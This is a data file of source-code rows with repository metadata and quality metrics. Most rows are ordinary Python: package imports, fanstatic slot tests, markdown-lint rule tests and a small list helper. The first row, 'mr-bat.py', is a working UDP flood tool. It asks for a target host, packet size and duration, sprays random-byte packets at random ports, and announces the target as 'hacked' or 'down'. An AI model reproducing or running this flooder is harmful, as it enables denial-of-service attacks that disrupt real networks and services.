hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
73f89d7a5fe0d0c81a167d875bdcdc268a4e2bbe | 5,043 | py | Python | mr-bat.py | Bhai4You/Mr.Bat | 7d3e51a8c7dcd1d62df5622bb0bcb5e067811934 | [
"BSD-2-Clause"
] | 10 | 2019-09-02T07:25:11.000Z | 2021-12-19T09:33:41.000Z | mr-bat.py | Bhai4You/Mr.Bat | 7d3e51a8c7dcd1d62df5622bb0bcb5e067811934 | [
"BSD-2-Clause"
] | null | null | null | mr-bat.py | Bhai4You/Mr.Bat | 7d3e51a8c7dcd1d62df5622bb0bcb5e067811934 | [
"BSD-2-Clause"
] | 8 | 2019-04-16T08:27:00.000Z | 2021-08-04T20:39:16.000Z |
import socket
import random
import os, sys, subprocess,time
import os, sys, json, urllib, re
from time import sleep
os.system("clear")
reload(sys)
sys.setdefaultencoding("utf-8")
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[1m' # bold
RR = '\033[3m' # greencolor
def logo():
print(""" \033[1m\033[33m#\033[31m
\033[33m##\033[31m
###
####
#####
#######
#######
########
########
#########
##########
############
##############
\033[33m#\033[31m###############
################
##############
############## \033[33m####\033[31m
############## #####
############## #######
############## ###########
############### #############
################ ##############
################# \033[33m#\033[31m ################
################## \033[33m## # \033[31m#################
\033[33m#\033[31m################### \033[33m### ## \033[31m#################
################ \033[33m########\033[31m #################
################ \033[33m#######\033[31m ###################
################\033[33m####### \033[31m#####################
################\033[33m#####\033[31m ###################
############################################
###########################################
#########\033[33m##\033[31m###\033[33m##\033[31m##\033[33m#####\033[31m###################
########\033[33m#\033[31m#\033[33m#\033[31m#\033[33m#\033[31m#\033[33m#\033[31m##\033[33m#\033[31m###\033[33m#\033[31m##################
########\033[33m#\033[31m##\033[33m#\033[31m##\033[33m#\033[31m##\033[33m#\033[31m#\033[33m#\033[31m####################
#######\033[33m#\033[31m#####\033[33m#\033[31m##\033[33m#\033[31m###\033[33m#\033[31m#################
######################################
########################## #####
### ################### \033[33m##\033[31m
## ###############
\033[33m#\033[31m ## ########## \033[33mMr \033[31m.\033[33m Bat\033[31m
## ####
###
\033[33m ##\033[31m
\033[33m-by \033[31mS\033[33mutariya \033[31mP\033[33marixit\033[31m \033[33m#\033[31m
\n\t \033[31m\033[1m[_\033[33mIP Flooder\033[31m_]
\n\033[0m\033[1m
\t \033[33m\033[1m[-] \033[0m\033[1mPlatform : \033[33m\033[1mAndroid Termux
\t \033[1m\033[33m\033[1m[-] \033[0m\033[1mName : \033[33m\033[1mMr.Bat
\t \033[1m\033[33m\033[1m[-] \033[0m\033[1mSite : \033[33mwww.bhai4you.blogspot.com
\t \033[1m\033[33m\033[1m[-] \033[0m\033[1mCoded by :\033[1m \033[33m[ \033[32m\033[1mParixit \033[33m ]
\t \033[1m\033[33m\033[1m[-] \033[0m\033[1mSec.Code : \033[33m\033[1m8h4i\033[0m
\t \033[1m\033[33m\033[1m[-] \033[0m\033[1mDate : \033[33m\033[1m10-Dec-17\033[0m
""")
logo()
print("\n\n\n\t\t\033[32m\033[1mMr.Bat")
print("\033[33m\033[1m UDP Port Flooder By \033[31m8h4i\033[0m")
attack = raw_input("\n\n\n\033[1mWebsite or IP ==> \033[33m")
print("\n\n\tEnter Flood Size (1-6000) \n")
package = input("\033[0m\033[1mFlood Size ===>\033[33m ")
print("\n\n\tEnter Time Of Flood (sec) \n")
duration = input("\033[0m\033[1mTime (Sec.) ===>\033[33m ")
durclock = (lambda:0, time.clock)[duration > 0]
duration = (1, (durclock() + duration))[duration > 0]
packet = random._urandom(package)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print("Mr.Bat Attack Started on \033[32m%s \033[33mwith \033[32m%s\033[33m bytes for \033[32m%s\033[33m seconds." % (attack, package, duration))
while True:
if (durclock() < duration):
port = random.randint(1, 65535)
sock.sendto(packet, (attack, port))
else:
break
print("\n")
print("\n\033[31m\033[1mFlooding Completed...:D\033[33m\n")
print("Mr.Bat Attack has completed on \033[32m%s\033[33m for \033[32m%s\033[33m seconds by Sutariya Parixit." % (attack, duration))
def connect(i):
try:
sock1 = socket(AF_INET, SOCK_STREAM)
sock1.connect((host, port))
sock1.sendto(packet, (ip,port))
sleep(99)
sock1.close
except:
print(" Your Target Have Been Hacked!!!")
n = 0
while 1:
try:
start_new_thread(connect, (n,))
except:
print "\n\t\t\033[33mYour Target Is Down!!!"
print "\033[32m<+> mr.Bat!! mr.Bat!! mr.Bat!! mr.Bat!! mr.Bat!!"
sleep(0.1)
| 41 | 154 | 0.414832 | 585 | 5,043 | 3.558974 | 0.247863 | 0.167147 | 0.198847 | 0.201729 | 0.355908 | 0.32757 | 0.300672 | 0.269452 | 0.245917 | 0.245917 | 0 | 0.21967 | 0.266111 | 5,043 | 122 | 155 | 41.336066 | 0.34288 | 0.012294 | 0 | 0.130841 | 0 | 0.149533 | 0.763581 | 0.275855 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.046729 | null | null | 0.11215 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fb5ae2c95460d7de42c3a9230ffc9c8ea9b1f5de | 313 | py | Python | renormalizer/model/__init__.py | liwt31/Renormalizer | 123a9d53f4f5f32c0088c255475f0ee60d02c745 | [
"Apache-2.0"
] | null | null | null | renormalizer/model/__init__.py | liwt31/Renormalizer | 123a9d53f4f5f32c0088c255475f0ee60d02c745 | [
"Apache-2.0"
] | null | null | null | renormalizer/model/__init__.py | liwt31/Renormalizer | 123a9d53f4f5f32c0088c255475f0ee60d02c745 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Author: Jiajun Ren <jiajunren0522@gmail.com>
from renormalizer.model.phonon import Phonon
from renormalizer.model.mol import Mol
from renormalizer.model.mlist import MolList, MolList2, ModelTranslator, construct_j_matrix, load_from_dict
from renormalizer.model.ephtable import EphTable
| 39.125 | 107 | 0.814696 | 41 | 313 | 6.121951 | 0.609756 | 0.25498 | 0.334661 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 0.099042 | 313 | 7 | 108 | 44.714286 | 0.868794 | 0.210863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fb84a81f70cc5196376cb27504ffee5649923d90 | 34 | py | Python | src/qibo/callbacks.py | mofeing/qibo | 3eb675ba893bf35f103d41a8a64c86aae9cbf616 | [
"Apache-2.0"
] | 81 | 2020-09-04T10:54:40.000Z | 2021-05-17T13:20:38.000Z | src/qibo/callbacks.py | mofeing/qibo | 3eb675ba893bf35f103d41a8a64c86aae9cbf616 | [
"Apache-2.0"
] | 201 | 2020-08-24T08:41:33.000Z | 2021-05-18T12:23:19.000Z | src/qibo/callbacks.py | mofeing/qibo | 3eb675ba893bf35f103d41a8a64c86aae9cbf616 | [
"Apache-2.0"
] | 20 | 2021-06-11T18:13:09.000Z | 2022-03-28T07:32:09.000Z | from qibo.core.callbacks import *
| 17 | 33 | 0.794118 | 5 | 34 | 5.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8375937d69dc11dce3ae3c5c6744fc1159c60450 | 39 | py | Python | echoblog.py | echocho/echoblog | af1d3b361df1fef1e834d311f44e99df7ef72f11 | [
"MIT"
] | null | null | null | echoblog.py | echocho/echoblog | af1d3b361df1fef1e834d311f44e99df7ef72f11 | [
"MIT"
] | null | null | null | echoblog.py | echocho/echoblog | af1d3b361df1fef1e834d311f44e99df7ef72f11 | [
"MIT"
] | null | null | null | #! flask/bin/python
from app import app | 19.5 | 19 | 0.769231 | 7 | 39 | 4.285714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128205 | 39 | 2 | 20 | 19.5 | 0.882353 | 0.461538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
83b4552393a6b8d1fb150e8e13553c00b85f3dc5 | 134 | py | Python | component/parameter/__init__.py | sepal-contrib/se.plan | a534d0f15e371310b6bc483867685f8a21f790c0 | [
"MIT"
] | 5 | 2020-11-06T17:24:57.000Z | 2021-12-21T23:06:22.000Z | component/parameter/__init__.py | sepal-contrib/se.plan | a534d0f15e371310b6bc483867685f8a21f790c0 | [
"MIT"
] | 90 | 2020-11-22T13:19:45.000Z | 2022-02-18T14:00:35.000Z | component/parameter/__init__.py | sepal-contrib/se.plan | a534d0f15e371310b6bc483867685f8a21f790c0 | [
"MIT"
] | 2 | 2020-11-06T17:25:03.000Z | 2021-06-09T23:03:24.000Z | from .file_params import *
from .gui_params import *
from .viz_params import *
from .color_gradient import *
from .directory import *
| 22.333333 | 29 | 0.776119 | 19 | 134 | 5.263158 | 0.473684 | 0.4 | 0.48 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149254 | 134 | 5 | 30 | 26.8 | 0.877193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
f7c437aadd0ec1f61642c252bb5e72481c03c6fe | 4,113 | py | Python | fanstatic/test_slot.py | derilinx/fanstatic | 661ee3619c607aaa4f8c654d0e8093f260cf5288 | [
"BSD-3-Clause"
] | null | null | null | fanstatic/test_slot.py | derilinx/fanstatic | 661ee3619c607aaa4f8c654d0e8093f260cf5288 | [
"BSD-3-Clause"
] | null | null | null | fanstatic/test_slot.py | derilinx/fanstatic | 661ee3619c607aaa4f8c654d0e8093f260cf5288 | [
"BSD-3-Clause"
] | 1 | 2021-08-09T03:23:13.000Z | 2021-08-09T03:23:13.000Z | import pytest
from fanstatic import NeededResources, Library, Resource, Slot, SlotError
def test_fill_slot():
needed = NeededResources()
lib = Library('lib', '')
slot = Slot(lib, '.js')
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.js')
needed.need(a, {slot: b})
resources = needed.resources()
assert len(resources) == 2
# verify filled slot is correctly
assert resources[0].library is b.library
assert resources[0].relpath is b.relpath
def test_dont_fill_required_slot():
needed = NeededResources()
lib = Library('lib', '')
slot = Slot(lib, '.js')
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.js')
needed.need(a)
with pytest.raises(SlotError):
resources = needed.resources()
def test_no_need_to_fill_in_not_required():
needed = NeededResources()
lib = Library('lib', '')
slot = Slot(lib, '.js', required=False)
a = Resource(lib, 'a.js', depends=[slot])
needed.need(a)
# slot wasn't required and not filled in, so filled slot doesn't show up
assert needed.resources() == [a]
def test_fill_slot_wrong_extension():
needed = NeededResources()
lib = Library('lib', '')
slot = Slot(lib, '.js')
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.css')
needed.need(a, {slot: b})
with pytest.raises(SlotError):
resources = needed.resources()
def test_fill_slot_wrong_dependencies():
needed = NeededResources()
lib = Library('lib', '')
slot = Slot(lib, '.js')
a = Resource(lib, 'a.js', depends=[slot])
c = Resource(lib, 'c.js')
b = Resource(lib, 'b.js', depends=[c])
needed.need(a, {slot: b})
with pytest.raises(SlotError):
resources = needed.resources()
def test_render_filled_slots():
needed = NeededResources()
lib = Library('lib', '')
slot = Slot(lib, '.js')
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.js')
needed.need(a, {slot: b})
assert needed.render() == '''\
<script type="text/javascript" src="/fanstatic/lib/b.js"></script>
<script type="text/javascript" src="/fanstatic/lib/a.js"></script>'''
def test_slot_depends():
needed = NeededResources()
lib = Library('lib', '')
c = Resource(lib, 'c.js')
slot = Slot(lib, '.js', depends=[c])
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.js', depends=[c])
needed.need(a, {slot: b})
assert needed.render() == '''\
<script type="text/javascript" src="/fanstatic/lib/c.js"></script>
<script type="text/javascript" src="/fanstatic/lib/b.js"></script>
<script type="text/javascript" src="/fanstatic/lib/a.js"></script>'''
def test_slot_depends_subset():
needed = NeededResources()
lib = Library('lib', '')
c = Resource(lib, 'c.js')
slot = Slot(lib, '.js', depends=[c])
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.js', depends=[])
needed.need(a, {slot: b})
assert needed.render() == '''\
<script type="text/javascript" src="/fanstatic/lib/c.js"></script>
<script type="text/javascript" src="/fanstatic/lib/b.js"></script>
<script type="text/javascript" src="/fanstatic/lib/a.js"></script>'''
def test_slot_depends_incorrect():
needed = NeededResources()
lib = Library('lib', '')
c = Resource(lib, 'c.js')
slot = Slot(lib, '.js', depends=[c])
a = Resource(lib, 'a.js', depends=[slot])
d = Resource(lib, 'd.js')
b = Resource(lib, 'b.js', depends=[d])
needed.need(a, {slot: b})
with pytest.raises(SlotError):
needed.render()
def test_slot_minified():
needed = NeededResources(minified=True)
lib = Library('lib', '')
slot = Slot(lib, '.js')
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.js', minified='b-min.js')
needed.need(a, {slot: b})
assert needed.render() == '''\
<script type="text/javascript" src="/fanstatic/lib/b-min.js"></script>
<script type="text/javascript" src="/fanstatic/lib/a.js"></script>'''
| 25.079268 | 76 | 0.605884 | 546 | 4,113 | 4.501832 | 0.115385 | 0.107404 | 0.034174 | 0.052889 | 0.788853 | 0.770138 | 0.770138 | 0.748983 | 0.748983 | 0.690399 | 0 | 0.000914 | 0.202285 | 4,113 | 163 | 77 | 25.233129 | 0.748247 | 0.024799 | 0 | 0.757282 | 0 | 0.009709 | 0.210329 | 0.143214 | 0 | 0 | 0 | 0 | 0.07767 | 1 | 0.097087 | false | 0 | 0.019417 | 0 | 0.116505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
791c95db1d70960b129202b5bb0fc14dfaa1810a | 89 | py | Python | TWLight/comments/__init__.py | jajodiaraghav/TWLight | 22359ab0b95ee3653e8ffa0eb698acd7bb8ebf70 | [
"MIT"
] | 1 | 2019-10-24T04:49:52.000Z | 2019-10-24T04:49:52.000Z | TWLight/comments/__init__.py | jajodiaraghav/TWLight | 22359ab0b95ee3653e8ffa0eb698acd7bb8ebf70 | [
"MIT"
] | 1 | 2019-03-29T15:29:45.000Z | 2019-03-29T15:57:20.000Z | TWLight/comments/__init__.py | jajodiaraghav/TWLight | 22359ab0b95ee3653e8ffa0eb698acd7bb8ebf70 | [
"MIT"
] | 1 | 2019-09-26T14:40:27.000Z | 2019-09-26T14:40:27.000Z | def get_form():
from .forms import CommentWithoutEmail
return CommentWithoutEmail | 29.666667 | 42 | 0.786517 | 9 | 89 | 7.666667 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168539 | 89 | 3 | 43 | 29.666667 | 0.932432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f7169146ec3baeb91915b19f26b91545909663f8 | 149 | py | Python | foundation/migrate.py | shreyashah115/foundation | 42f19d23cfda77bae533f4884aecc15b3cd07f14 | [
"MIT"
] | null | null | null | foundation/migrate.py | shreyashah115/foundation | 42f19d23cfda77bae533f4884aecc15b3cd07f14 | [
"MIT"
] | null | null | null | foundation/migrate.py | shreyashah115/foundation | 42f19d23cfda77bae533f4884aecc15b3cd07f14 | [
"MIT"
] | null | null | null | import frappe
from frappe.database import Database
from markdown2 import markdown
from frappe.utils import validate_email_add
def migrate():
pass
| 16.555556 | 43 | 0.832215 | 21 | 149 | 5.809524 | 0.619048 | 0.163934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007752 | 0.134228 | 149 | 8 | 44 | 18.625 | 0.937985 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0.166667 | 0.666667 | 0 | 0.833333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
f74bd12d7d4e22137523ec857496b79106d59c37 | 4,636 | py | Python | test/test_md019.py | jackdewinter/pymarkdown | 7ae408ba0b24506fa07552ffe520750bbff38c53 | [
"MIT"
] | 20 | 2021-01-14T17:39:09.000Z | 2022-03-14T08:35:22.000Z | test/test_md019.py | jackdewinter/pymarkdown | 7ae408ba0b24506fa07552ffe520750bbff38c53 | [
"MIT"
] | 304 | 2020-08-15T23:24:00.000Z | 2022-03-31T23:34:03.000Z | test/test_md019.py | jackdewinter/pymarkdown | 7ae408ba0b24506fa07552ffe520750bbff38c53 | [
"MIT"
] | 3 | 2021-08-11T10:26:26.000Z | 2021-11-02T20:41:27.000Z | """
Module to provide tests related to the MD019 rule.
"""
from test.markdown_scanner import MarkdownScanner
import pytest
# pylint: disable=too-many-lines
@pytest.mark.rules
def test_md019_good_single_spacing():
"""
Test to make sure this rule does not trigger with a document that
contains an Atx Heading with a single space before text.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md019/single_spacing.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md019_bad_multiple_spacing():
"""
    Test to make sure this rule does trigger with a document that
contains Atx Headings with multiple spaces before text.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md019/multiple_spacing.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md019/multiple_spacing.md:1:1: "
+ "MD019: Multiple spaces are present after hash character on Atx Heading. (no-multiple-space-atx)\n"
"test/resources/rules/md019/multiple_spacing.md:3:1: "
+ "MD019: Multiple spaces are present after hash character on Atx Heading. (no-multiple-space-atx)\n"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
def test_md019_bad_multiple_spacing_with_inline():
"""
    Test to make sure this rule does trigger with a document that
contains multiple Atx Headings with multiple spaces before text,
including an inline element in the heading.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md019/multiple_spacing_with_inline.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md019/multiple_spacing_with_inline.md:1:1: "
+ "MD019: Multiple spaces are present after hash character on Atx Heading. (no-multiple-space-atx)\n"
"test/resources/rules/md019/multiple_spacing_with_inline.md:3:1: "
+ "MD019: Multiple spaces are present after hash character on Atx Heading. (no-multiple-space-atx)\n"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
def test_md019_bad_multiple_spacing_with_indent():
"""
    Test to make sure this rule does trigger with a document that
    contains multiple Atx Headings with multiple spaces before text,
    including indents.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--disable-rules",
"md023",
"scan",
"test/resources/rules/md019/multiple_spacing_with_indent.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md019/multiple_spacing_with_indent.md:1:2: "
+ "MD019: Multiple spaces are present after hash character on Atx Heading. (no-multiple-space-atx)\n"
"test/resources/rules/md019/multiple_spacing_with_indent.md:3:3: "
+ "MD019: Multiple spaces are present after hash character on Atx Heading. (no-multiple-space-atx)\n"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
def test_md019_bad_single_space_single_tab():
"""
Test to make sure this rule does not trigger with a document that
contains multiple Atx Headings with tabs before text.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--disable-rules",
"md010",
"scan",
"test/resources/rules/md019/single_space_single_tab.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
| 28.617284 | 109 | 0.690035 | 562 | 4,636 | 5.475089 | 0.153025 | 0.063373 | 0.064348 | 0.082223 | 0.916477 | 0.914202 | 0.880403 | 0.830029 | 0.828729 | 0.80078 | 0 | 0.025563 | 0.223684 | 4,636 | 161 | 110 | 28.795031 | 0.829397 | 0.186799 | 0 | 0.625 | 0 | 0.068182 | 0.346048 | 0.209385 | 0 | 0 | 0 | 0 | 0.056818 | 1 | 0.056818 | false | 0 | 0.022727 | 0 | 0.079545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f764d091b3a085d00802ab7f140d23d2ba7a09fd | 125 | py | Python | 0x04-python-more_data_structures/1-search_replace.py | omarcherni007/holbertonschool-higher_level_programming | 65f3430ab0310f85368d73cb72e139631e8c6f1e | [
"MIT"
] | 1 | 2022-01-04T11:07:56.000Z | 2022-01-04T11:07:56.000Z | 0x04-python-more_data_structures/1-search_replace.py | omarcherni007/holbertonschool-higher_level_programming | 65f3430ab0310f85368d73cb72e139631e8c6f1e | [
"MIT"
] | null | null | null | 0x04-python-more_data_structures/1-search_replace.py | omarcherni007/holbertonschool-higher_level_programming | 65f3430ab0310f85368d73cb72e139631e8c6f1e | [
"MIT"
] | null | null | null | #!/usr/bin/python3
def search_replace(my_list, search, replace):
return [replace if i == search else i for i in my_list]
